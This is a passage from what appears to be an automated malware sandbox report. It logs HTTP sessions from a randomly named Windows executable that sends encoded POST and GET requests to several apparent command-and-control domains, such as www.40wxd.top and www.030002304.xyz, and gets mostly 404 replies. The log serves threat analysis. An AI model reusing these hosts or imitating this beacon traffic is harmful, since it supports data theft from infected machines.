                                                       48 | 192.168.2.4 | 63364 | 3.33.130.190 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:17.402164936 CEST | 502 | OUT | GET /hzuv/?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.doggieradio.net
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Sep 11, 2024 11:20:17.879173040 CEST | 392 | IN | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:20:17 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8="}</script></head></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       49 | 192.168.2.4 | 63365 | 206.119.82.134 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:23.318247080 CEST | 754 | OUT | POST /v4cy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.40wxd.top
                                                      Origin: http://www.40wxd.top
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.40wxd.top/v4cy/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=V4d7zSOsjLU/iOVnYG18++UafCg8CO/SqCrunxMbz+l8bqL/EtsLHvO5dB75iaSn8tH54gyYVK12v4PxpUdZxwnYwIXDXMD7X4BrhgNQFzoNgcJg9LWs8VuyPsLRA5udCdfrdc6QSsbXwh8oJXXQI9dHKdBy9WjioNlhUKtmqIPGRiSni0g/Nj2+AZ0XLJNkDA==
                                                       Sep 11, 2024 11:20:24.193732023 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:20:24 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                       Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       50 | 192.168.2.4 | 63366 | 206.119.82.134 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:26.277415037 CEST | 774 | OUT | POST /v4cy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.40wxd.top
                                                      Origin: http://www.40wxd.top
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.40wxd.top/v4cy/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=V4d7zSOsjLU/ivFnen18vOUZBSg8Lu/WqCnunzgLzIV8e/n/FssLX/O5Fx7l/qTK8tKE4iWYVKh2v6nxpjBexgnesIXBIcD7X4BrhgYNFzgNgMZg/qWv11u1KcLRLZuZCdfddd22SpfXwgMoJCrfH9dBVtAq9TSFm+c+d65Aoo/KUkD9zFBofjSNde9jGKwtYGgYdIuYRYnZAr/RL1cjLG8=
                                                       Sep 11, 2024 11:20:27.185648918 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:20:27 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                       Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       51 | 192.168.2.4 | 63367 | 206.119.82.134 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:28.819073915 CEST | 10856 | OUT | POST /v4cy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.40wxd.top
                                                      Origin: http://www.40wxd.top
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.40wxd.top/v4cy/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Data Ascii: pP_8= [TRUNCATED]
                                                       Sep 11, 2024 11:20:29.713053942 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:20:29 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                       Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       52 | 192.168.2.4 | 63368 | 206.119.82.134 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:31.357500076 CEST | 496 | OUT | GET /v4cy/?pP_8=Y61bwknhs9hp9ZZcYkoE/rAHAVoATd7g+jLHgGwEyJh/LKrsM6hsQ8y2QWfg6r+Pzdmi8z7VAqFTz6bCx0F+lD/ii+PJJ/2nHI8msyIEMT4A2MQn/4udzH0=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.40wxd.top
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Sep 11, 2024 11:20:32.262432098 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:20:32 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                       Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       53 | 192.168.2.4 | 63369 | 65.21.196.90 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:37.384572029 CEST | 766 | OUT | POST /tmpg/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.030002304.xyz
                                                      Origin: http://www.030002304.xyz
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.030002304.xyz/tmpg/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=PXnalYPT40IfIrVWYxpWmvjsmrtMctoK8mWxydttxk/o9jGiMnbqAHXvVnFL1FvbT9iEasvlWObRN80y3RBvN6HOVShHReDPFYSjzHxU4CBaI7Hjri/3h4x7bEKXzauhO44XoSGr5O5GJetUu06JHah39CWDHsI+vhtONYd9rWYJIJQmznQCNdbfhj2IkVrbiA==
                                                       Sep 11, 2024 11:20:38.047235966 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:20:37 GMT
                                                      vary: User-Agent
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       54 | 192.168.2.4 | 63370 | 65.21.196.90 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:39.927700043 CEST | 786 | OUT | POST /tmpg/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.030002304.xyz
                                                      Origin: http://www.030002304.xyz
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.030002304.xyz/tmpg/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 50 58 6e 61 6c 59 50 54 34 30 49 66 4f 49 4e 57 4c 69 42 57 76 76 6a 72 73 4c 74 4d 56 4e 6f 4f 38 6d 61 78 79 63 70 62 78 32 62 6f 39 43 32 69 65 6d 62 71 48 48 58 76 64 48 46 4f 37 6c 76 51 54 39 65 4d 61 75 37 6c 57 4f 66 52 4e 34 34 79 32 6d 56 67 4d 71 48 4d 5a 79 68 46 56 65 44 50 46 59 53 6a 7a 48 31 79 34 43 5a 61 49 4b 33 6a 73 7a 2f 30 76 59 78 36 4c 6b 4b 58 6c 71 76 6f 4f 34 34 50 6f 51 6a 2b 35 4e 42 47 4a 65 39 55 75 68 57 4b 4f 61 68 31 35 43 57 53 57 63 4a 4d 32 7a 77 39 4e 59 5a 38 79 44 39 30 4e 50 42 38 69 57 78 56 66 64 2f 73 38 6b 2f 38 70 57 57 53 35 4d 33 6f 45 74 4c 45 2f 47 4c 31 64 47 37 32 4a 49 38 77 45 75 59 3d
                                                      Data Ascii: pP_8=PXnalYPT40IfOINWLiBWvvjrsLtMVNoO8maxycpbx2bo9C2iembqHHXvdHFO7lvQT9eMau7lWOfRN44y2mVgMqHMZyhFVeDPFYSjzH1y4CZaIK3jsz/0vYx6LkKXlqvoO44PoQj+5NBGJe9UuhWKOah15CWSWcJM2zw9NYZ8yD90NPB8iWxVfd/s8k/8pWWS5M3oEtLE/GL1dG72JI8wEuY=
                                                       Sep 11, 2024 11:20:40.714804888 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:20:40 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       55 | 192.168.2.4 | 63371 | 65.21.196.90 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:42.547439098 CEST | 10868 | OUT | POST /tmpg/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.030002304.xyz
                                                      Origin: http://www.030002304.xyz
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.030002304.xyz/tmpg/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 50 58 6e 61 6c 59 50 54 34 30 49 66 4f 49 4e 57 4c 69 42 57 76 76 6a 72 73 4c 74 4d 56 4e 6f 4f 38 6d 61 78 79 63 70 62 78 32 54 6f 36 78 2b 69 4d 46 44 71 47 48 58 76 54 6e 46 50 37 6c 76 4a 54 35 4b 49 61 75 6e 66 57 4d 58 52 50 62 77 79 78 54 35 67 43 71 48 4d 52 53 68 45 52 65 44 47 46 59 69 6e 7a 48 46 79 34 43 5a 61 49 49 76 6a 36 79 2f 30 69 34 78 37 62 45 4b 6c 7a 61 75 42 4f 34 67 66 6f 51 6e 75 35 38 68 47 4a 36 68 55 72 58 43 4b 50 36 68 72 30 69 58 50 57 63 46 58 32 7a 39 47 4e 62 45 5a 79 46 42 30 41 49 45 49 2f 69 46 31 4a 72 58 72 6e 47 50 66 78 57 71 44 34 75 6e 57 45 5a 76 71 6e 53 50 33 57 68 75 4f 63 61 73 37 54 4c 34 2f 76 75 6f 59 70 72 44 56 4b 71 6b 58 68 6c 37 2f 47 68 56 70 71 50 6c 47 47 7a 58 39 34 36 43 6b 2b 39 63 52 57 6b 55 62 4b 4f 65 31 5a 74 6e 78 35 45 69 59 4b 2b 6e 55 6d 4c 71 55 2f 71 67 45 4a 79 79 6e 35 6e 48 76 30 56 6d 4d 73 5a 72 4f 30 52 53 39 74 6d 42 51 67 77 6f 72 32 41 37 58 56 34 7a 6e 4a 64 75 68 6e 65 67 6a 71 4b 7a 52 73 4f 6b 4a 32 [TRUNCATED]
                                                       Data Ascii: pP_8= [TRUNCATED]


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       56 | 192.168.2.4 | 63372 | 65.21.196.90 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:45.093060970 CEST | 500 | OUT | GET /tmpg/?pP_8=CVP6mu+p7AIAUeNlIzILzbbwoLVaLtEPp22R6YZws2HFwQ6gURLmFkDuTnsSzWDqU9qDd9fOW/TdFJInumJ7doiOdR5iBNH/a8rQv0stnRBrBPHE6g/KoYg=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.030002304.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Sep 11, 2024 11:20:45.743110895 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:20:45 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       57 | 192.168.2.4 | 63373 | 38.181.141.122 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:51.601202965 CEST | 760 | OUT | POST /c0yj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.kfowks.site
                                                      Origin: http://www.kfowks.site
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.kfowks.site/c0yj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 63 76 5a 70 4c 56 37 59 78 53 68 44 52 35 6f 43 36 48 64 42 2b 76 6b 74 2f 6b 34 76 6c 69 34 30 43 66 72 59 68 37 32 51 4d 6b 79 69 6c 30 43 37 44 57 51 34 77 4b 6b 49 30 56 72 2f 32 73 74 42 45 6a 65 4b 42 4f 42 39 32 2f 53 61 58 62 4b 64 48 5a 5a 76 4a 79 72 44 45 49 49 47 55 54 4b 4e 41 56 68 52 45 31 79 51 50 50 31 5a 41 42 66 53 36 39 64 6d 2f 79 45 72 6c 46 72 6b 32 6b 4d 54 34 49 63 35 38 49 76 35 38 49 51 56 49 4f 65 6a 50 46 2f 6e 35 52 2f 4b 67 56 74 54 47 59 2f 64 46 75 5a 69 56 75 66 72 79 36 6e 2f 39 50 64 65 78 6d 5a 49 42 54 54 74 45 30 4d 34 48 49 37 6b 45 67 3d 3d
                                                      Data Ascii: pP_8=cvZpLV7YxShDR5oC6HdB+vkt/k4vli40CfrYh72QMkyil0C7DWQ4wKkI0Vr/2stBEjeKBOB92/SaXbKdHZZvJyrDEIIGUTKNAVhRE1yQPP1ZABfS69dm/yErlFrk2kMT4Ic58Iv58IQVIOejPF/n5R/KgVtTGY/dFuZiVufry6n/9PdexmZIBTTtE0M4HI7kEg==
                                                       Sep 11, 2024 11:20:53.091767073 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 11 Sep 2024 09:20:59 GMT
                                                      Connection: close
                                                      Content-Length: 315
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       58 | 192.168.2.4 | 63374 | 38.181.141.122 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:54.142148018 CEST | 780 | OUT | POST /c0yj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.kfowks.site
                                                      Origin: http://www.kfowks.site
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.kfowks.site/c0yj/
